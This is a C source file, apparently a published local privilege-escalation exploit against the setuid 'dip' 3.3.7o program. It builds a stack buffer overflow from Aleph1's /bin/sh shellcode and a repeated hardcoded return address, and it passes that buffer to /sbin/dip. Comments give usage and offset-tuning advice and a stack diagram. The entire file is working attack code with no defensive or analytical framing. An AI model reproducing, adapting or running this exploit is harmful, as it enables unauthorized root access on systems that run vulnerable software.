/*# This will yeild a local root shell using a buffer overflow in
  # dip-3.3.7o. try offsets of about -100 to 100 if just doing a
  # gcc dip-exp.c -o dipex;./dipex 
  # Vapid Labs  http://vapid.dhs.org
  # lwc@vapid.dhs.org Larry W. Cashdollar*/

#include <stdio.h>
#include <stdlib.h>


#define LEN 130  // buffer size
#define RET 0xbffffc42  // default return address

char shellcode[]= /*Aleph1's shell code. */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(int argc , char *argv[]) {
int i;
char buffer[LEN];

long retaddr = RET; // our default address to jmp to
if (argc  > 1) retaddr = retaddr - atoi(argv[1]); 

printf("Using address %x\n",retaddr);

memcpy(buffer,shellcode,strlen(shellcode));
/*copy all the shell code into our buffer*/

for (i=strlen(shellcode);i<LEN;i+=4) *(long *)&buffer[i] = retaddr;
/* fill from buffer[strlen(shellcode)] to the end of the buffer with 
pointers to the beginging of buffer or near %esp*/

/*exec dip with our egg.*/
execl("/sbin/dip","dip","-k","-l",buffer,0);

}

/*
                                            %ebp %eip  
  [%esp][SSSSSSSSSSSSSSSSRRRRRRRRRRRRRRRRRRR][RR][RR]
  need to jump way back here as there are no nops.*/